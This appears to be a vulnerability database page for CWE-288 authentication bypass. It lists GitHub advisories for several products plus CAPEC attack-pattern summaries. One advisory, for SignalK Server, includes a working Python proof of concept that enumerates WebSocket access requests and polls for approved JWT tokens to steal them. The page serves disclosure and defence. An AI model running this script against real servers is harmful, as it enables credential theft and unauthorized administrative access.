CWE-288
AllowedAuthentication Bypass Using an Alternate Path or Channel
Abstraction: Base · Status: Incomplete
The product requires authentication, but the product has an alternate path or channel that does not require authentication.
1072 vulnerabilities reference this CWE, most recent first.
GHSA-FC83-86WW-F7QW
Vulnerability from github – Published: 2024-06-11 15:31 – Updated: 2024-06-11 15:31An authentication bypass vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway component that if exploited allows attackers without any access to interact with the services and the post-authentication attack surface.
{
"affected": [],
"aliases": [
"CVE-2024-2013"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-11T14:15:11Z",
"severity": "CRITICAL"
},
"details": "An authentication bypass vulnerability exists in the FOXMAN-UN/UNEM server /\nAPI Gateway component that if exploited allows attackers without \nany access to interact with the services and the post-authentication \nattack surface.",
"id": "GHSA-fc83-86ww-f7qw",
"modified": "2024-06-11T15:31:14Z",
"published": "2024-06-11T15:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2013"
},
{
"type": "WEB",
"url": "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000201\u0026languageCode=en\u0026Preview=true"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FJ3H-M99F-V4Q3
Vulnerability from github – Published: 2025-05-21 18:33 – Updated: 2025-05-21 18:33Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal One Time Password allows Functionality Bypass.This issue affects One Time Password: from 0.0.0 before 1.3.0.
{
"affected": [],
"aliases": [
"CVE-2025-48010"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-21T17:15:58Z",
"severity": "MODERATE"
},
"details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal One Time Password allows Functionality Bypass.This issue affects One Time Password: from 0.0.0 before 1.3.0.",
"id": "GHSA-fj3h-m99f-v4q3",
"modified": "2025-05-21T18:33:31Z",
"published": "2025-05-21T18:33:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48010"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2025-061"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FJ85-459R-FJWQ
Vulnerability from github – Published: 2025-02-09 00:33 – Updated: 2025-02-09 00:33The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_enquiry_agent_contact_form_submit_callback' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
{
"affected": [],
"aliases": [
"CVE-2025-0316"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-08T22:15:28Z",
"severity": "CRITICAL"
},
"details": "The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the \u0027wp_dp_enquiry_agent_contact_form_submit_callback\u0027 function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.",
"id": "GHSA-fj85-459r-fjwq",
"modified": "2025-02-09T00:33:42Z",
"published": "2025-02-09T00:33:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0316"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/directory-multipurpose-wordpress-theme/10480929"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FMGJ-X956-32C7
Vulnerability from github – Published: 2026-03-05 06:30 – Updated: 2026-03-09 15:30Authentication Bypass Using an Alternate Path or Channel vulnerability in designthemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Authentication Abuse.This issue affects WeDesignTech Ultimate Booking Addon: from n/a through <= 1.0.1.
{
"affected": [],
"aliases": [
"CVE-2026-27390"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-05T06:16:28Z",
"severity": "HIGH"
},
"details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in designthemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Authentication Abuse.This issue affects WeDesignTech Ultimate Booking Addon: from n/a through \u003c= 1.0.1.",
"id": "GHSA-fmgj-x956-32c7",
"modified": "2026-03-09T15:30:32Z",
"published": "2026-03-05T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27390"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/wedesigntech-ultimate-booking-addon/vulnerability/wordpress-wedesigntech-ultimate-booking-addon-plugin-1-0-1-account-takeover-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FP9M-PHR9-853C
Vulnerability from github – Published: 2025-11-13 03:31 – Updated: 2026-02-06 15:30An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the 'Security Update for DSL Series Router' section on the ASUS Security Advisory for more information.
{
"affected": [],
"aliases": [
"CVE-2025-59367"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-13T03:16:26Z",
"severity": "CRITICAL"
},
"details": "An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the \u0027Security Update for DSL Series Router\u0027 section on the ASUS Security Advisory for more information.",
"id": "GHSA-fp9m-phr9-853c",
"modified": "2026-02-06T15:30:59Z",
"published": "2025-11-13T03:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59367"
},
{
"type": "WEB",
"url": "https://www.asus.com/security-advisory"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FPM3-HH7R-9CG9
Vulnerability from github – Published: 2024-07-21 09:30 – Updated: 2024-07-21 09:30D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel
{
"affected": [],
"aliases": [
"CVE-2024-38437"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-21T08:15:06Z",
"severity": "CRITICAL"
},
"details": "D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel",
"id": "GHSA-fpm3-hh7r-9cg9",
"modified": "2024-07-21T09:30:32Z",
"published": "2024-07-21T09:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38437"
},
{
"type": "WEB",
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FQ3G-G86H-MHJV
Vulnerability from github – Published: 2024-10-26 15:30 – Updated: 2024-10-26 15:30The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.
{
"affected": [],
"aliases": [
"CVE-2024-9501"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-26T13:15:11Z",
"severity": "CRITICAL"
},
"details": "The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.",
"id": "GHSA-fq3g-g86h-mhjv",
"modified": "2024-10-26T15:30:44Z",
"published": "2024-10-26T15:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9501"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-social/tags/3.0.6/inc/admin-create-user.php#L205"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3173675"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FQ56-HVG6-WVM5
Vulnerability from github – Published: 2026-01-02 15:28 – Updated: 2026-01-02 15:28SignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.
Unauthenticated WebSocket Request Enumeration: When a WebSocket client connects to the SignalK stream endpoint with the serverevents=all query parameter, the server sends all cached server events including ACCESS_REQUEST events that contain details about pending access requests. The startServerEvents function iterates over app.lastServerEvents and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when allow_readonly is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.
Unauthenticated Token Polling: The access request status endpoint at /signalk/v1/access/requests/:id returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The queryRequest function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.
An attacker has two paths to exploit these vulnerabilities:
-
The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.
-
The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.
Both paths require zero authentication and enable complete authentication bypass.
Affected Code
File: src/events.ts (lines 40-43)
Object.keys(app.lastServerEvents).forEach((propName) => {
spark.write(app.lastServerEvents[propName])
})
All cached server events, including ACCESS_REQUEST, are sent to any connected WebSocket client without permission checks.
File: src/tokensecurity.js (lines 946-948)
strategy.getAccessRequestsResponse = () => {
return filterRequests('accessRequest', 'PENDING')
}
This function returns all pending requests with full details, which is then broadcast as a server event.
File: src/requestResponse.js (lines 108-135)
function createReply(request, state, props) {
const reply = {
state: state,
requestId: request.requestId
}
if (request.updateCb) {
props.forEach((prop) => {
if (typeof request[prop] !== 'undefined') {
reply[prop] = request[prop] // Includes 'token' when approved
}
})
}
return reply
}
When an access request transitions to COMPLETED state with APPROVED permission, the token is included in the reply object.
File: src/interfaces/rest.js (endpoint registration)
The /signalk/v1/access/requests/:id endpoint uses readonly authentication, allowing unauthenticated access when allow_readonly is true.
Impact
An attacker can obtain any JWT token issued by the server without authentication. By exploiting the social engineering vulnerability to request admin permissions, they receive a fully privileged admin token granting access to all protected endpoints including package installation, effectively bypassing authentication entirely. Additionally, attackers can hijack legitimate device credentials by stealing tokens intended for real devices.
PoC
import json, websocket, requests, time
TARGET_IP, TARGET_PORT = "localhost", 3000
TARGET_WS = f"ws://{TARGET_IP}:{TARGET_PORT}"
TARGET_HTTP = f"http://{TARGET_IP}:{TARGET_PORT}"
def poll_for_token(request_id, href):
print(f"[*] Polling started for request {request_id}")
url = f"{TARGET_HTTP}{href}"
while True:
try:
r = requests.get(url)
if r.status_code == 200:
data = r.json()
state = data.get("state")
print(f"[.] Request {request_id} state: {state}")
if state == "COMPLETED":
access_req = data.get("accessRequest", {})
permission = access_req.get("permission")
token = access_req.get("token")
print(f"[*] Request completed - Permission: {permission}, Token present: {bool(token)}")
if token:
print(f"[+] TOKEN STOLEN")
print(f"[+] Permission: {permission}")
print(f"[+] JWT Token: {token}")
return token
else:
print(f"[-] Request {request_id} denied or no token")
return None
else:
print(f"[-] HTTP {r.status_code} for request {request_id}")
except Exception as e:
print(f"[-] Error polling {request_id}: {e}")
time.sleep(5)
def monitor_and_steal_tokens():
uri = f"{TARGET_WS}/signalk/v1/stream?serverevents=all"
print(f"[*] Connecting to {uri}")
ws = websocket.create_connection(uri)
print("[+] Connected, monitoring for ACCESS_REQUEST events...")
while True:
message = ws.recv()
msg = json.loads(message)
if msg.get("type") == "ACCESS_REQUEST":
print("[+] ACCESS_REQUEST event received!")
data = msg.get("data", [])
if data:
req = data[0]
request_id = req.get('requestId')
permissions = req.get('clientRequest', {}).get('permissions')
href = req.get('href', f'/signalk/v1/requests/{request_id}')
print(f"[*] Found request: {request_id}")
print(f"[*] Closing WebSocket and starting polling...")
ws.close()
poll_for_token(request_id, href)
break
if __name__ == "__main__":
monitor_and_steal_tokens()
Recommendations
- Require strict authentication for all WebSocket channels. The
serverevents=allparameter should only be accessible to authenticated admin users. Unauthenticated or readonly users should not receive any server events. - Place
ACCESS_REQUESTevents behind strict authentication. Even if other server events are available to readonly users, access request details must only be sent to authenticated administrators. - Implement client verification so only the original requester can retrieve their token
- Consider delivering tokens through a separate secure channel rather than the polling endpoint
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "signalk-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.19.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68620"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-02T15:28:54Z",
"nvd_published_at": "2026-01-01T19:15:53Z",
"severity": "CRITICAL"
},
"details": "SignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.\n\n**Unauthenticated WebSocket Request Enumeration**: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.\n\n**Unauthenticated Token Polling**: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.\n\nAn attacker has two paths to exploit these vulnerabilities:\n\n1. The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.\n\n2. The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.\n\nBoth paths require zero authentication and enable complete authentication bypass.\n\n### Affected Code\n\n**File**: `src/events.ts` (lines 40-43)\n\n```typescript\nObject.keys(app.lastServerEvents).forEach((propName) =\u003e {\n spark.write(app.lastServerEvents[propName])\n})\n```\n\nAll cached server events, including `ACCESS_REQUEST`, are sent to any connected WebSocket client without permission checks.\n\n**File**: `src/tokensecurity.js` (lines 946-948)\n\n```javascript\nstrategy.getAccessRequestsResponse = () =\u003e {\n return filterRequests(\u0027accessRequest\u0027, \u0027PENDING\u0027)\n}\n```\n\nThis function returns all pending requests with full details, which is then broadcast as a server event.\n\n**File**: `src/requestResponse.js` (lines 108-135)\n\n```javascript\nfunction createReply(request, state, props) {\n const reply = {\n state: state,\n requestId: request.requestId\n }\n\n if (request.updateCb) {\n props.forEach((prop) =\u003e {\n if (typeof request[prop] !== \u0027undefined\u0027) {\n reply[prop] = request[prop] // Includes \u0027token\u0027 when approved\n }\n })\n }\n return reply\n}\n```\n\nWhen an access request transitions to COMPLETED state with APPROVED permission, the token is included in the reply object.\n\n**File**: `src/interfaces/rest.js` (endpoint registration)\n\nThe `/signalk/v1/access/requests/:id` endpoint uses readonly authentication, allowing unauthenticated access when `allow_readonly` is true.\n\n### Impact\n\nAn attacker can obtain any JWT token issued by the server without authentication. By exploiting the social engineering vulnerability to request admin permissions, they receive a fully privileged admin token granting access to all protected endpoints including package installation, effectively bypassing authentication entirely. Additionally, attackers can hijack legitimate device credentials by stealing tokens intended for real devices.\n\n### PoC\n\n```python\nimport json, websocket, requests, time\n\nTARGET_IP, TARGET_PORT = \"localhost\", 3000\nTARGET_WS = f\"ws://{TARGET_IP}:{TARGET_PORT}\"\nTARGET_HTTP = f\"http://{TARGET_IP}:{TARGET_PORT}\"\n\ndef poll_for_token(request_id, href):\n print(f\"[*] Polling started for request {request_id}\")\n url = f\"{TARGET_HTTP}{href}\"\n while True:\n try:\n r = requests.get(url)\n \n if r.status_code == 200:\n data = r.json()\n state = data.get(\"state\")\n print(f\"[.] Request {request_id} state: {state}\")\n \n if state == \"COMPLETED\":\n access_req = data.get(\"accessRequest\", {})\n permission = access_req.get(\"permission\")\n token = access_req.get(\"token\")\n \n print(f\"[*] Request completed - Permission: {permission}, Token present: {bool(token)}\")\n \n if token:\n print(f\"[+] TOKEN STOLEN\")\n print(f\"[+] Permission: {permission}\")\n print(f\"[+] JWT Token: {token}\")\n return token\n else:\n print(f\"[-] Request {request_id} denied or no token\")\n return None\n else:\n print(f\"[-] HTTP {r.status_code} for request {request_id}\")\n \n except Exception as e:\n print(f\"[-] Error polling {request_id}: {e}\")\n \n time.sleep(5)\n\ndef monitor_and_steal_tokens():\n uri = f\"{TARGET_WS}/signalk/v1/stream?serverevents=all\"\n print(f\"[*] Connecting to {uri}\")\n \n ws = websocket.create_connection(uri)\n print(\"[+] Connected, monitoring for ACCESS_REQUEST events...\")\n \n while True:\n message = ws.recv()\n msg = json.loads(message)\n \n if msg.get(\"type\") == \"ACCESS_REQUEST\":\n print(\"[+] ACCESS_REQUEST event received!\")\n data = msg.get(\"data\", [])\n \n if data:\n req = data[0]\n request_id = req.get(\u0027requestId\u0027)\n permissions = req.get(\u0027clientRequest\u0027, {}).get(\u0027permissions\u0027)\n href = req.get(\u0027href\u0027, f\u0027/signalk/v1/requests/{request_id}\u0027)\n \n print(f\"[*] Found request: {request_id}\")\n print(f\"[*] Closing WebSocket and starting polling...\")\n \n ws.close()\n poll_for_token(request_id, href)\n break\n\nif __name__ == \"__main__\":\n monitor_and_steal_tokens()\n```\n\n### Recommendations\n\n1. Require strict authentication for all WebSocket channels. The `serverevents=all` parameter should only be accessible to authenticated admin users. Unauthenticated or readonly users should not receive any server events.\n2. Place `ACCESS_REQUEST` events behind strict authentication. Even if other server events are available to readonly users, access request details must only be sent to authenticated administrators.\n3. Implement client verification so only the original requester can retrieve their token\n4. Consider delivering tokens through a separate secure channel rather than the polling endpoint",
"id": "GHSA-fq56-hvg6-wvm5",
"modified": "2026-01-02T15:28:55Z",
"published": "2026-01-02T15:28:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3"
},
{
"type": "PACKAGE",
"url": "https://github.com/SignalK/signalk-server"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Signal K Server vulnerable to JWT Token Theft via WebSocket Enumeration and Unauthenticated Polling"
}
GHSA-FQPP-WF47-38VW
Vulnerability from github – Published: 2022-06-08 00:00 – Updated: 2022-06-17 00:01A vulnerability in the application authentication and authorization mechanism in Hitachi Energy's TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.
{
"affected": [],
"aliases": [
"CVE-2021-35530"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-07T21:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in the application authentication and authorization mechanism in Hitachi Energy\u0027s TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.",
"id": "GHSA-fqpp-wf47-38vw",
"modified": "2022-06-17T00:01:28Z",
"published": "2022-06-08T00:00:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35530"
},
{
"type": "WEB",
"url": "https://search.abb.com/library/Download.aspx?DocumentID=8DBD000080\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch\u0026utm_campaign=\u0026utm_content=2022.04_5763_Cybersecurity%20Advisory%20Update_May_03\u0026utm_medium=email\u0026utm_source=Eloqua"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FQVV-MH7W-3JQ3
Vulnerability from github – Published: 2024-12-21 15:30 – Updated: 2025-11-04 00:32IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.
{
"affected": [],
"aliases": [
"CVE-2024-51464"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-21T14:15:21Z",
"severity": "MODERATE"
},
"details": "IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.",
"id": "GHSA-fqvv-mh7w-3jq3",
"modified": "2025-11-04T00:32:15Z",
"published": "2024-12-21T15:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51464"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7179509"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Dec/19"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Dec/20"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.
CAPEC-127: Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.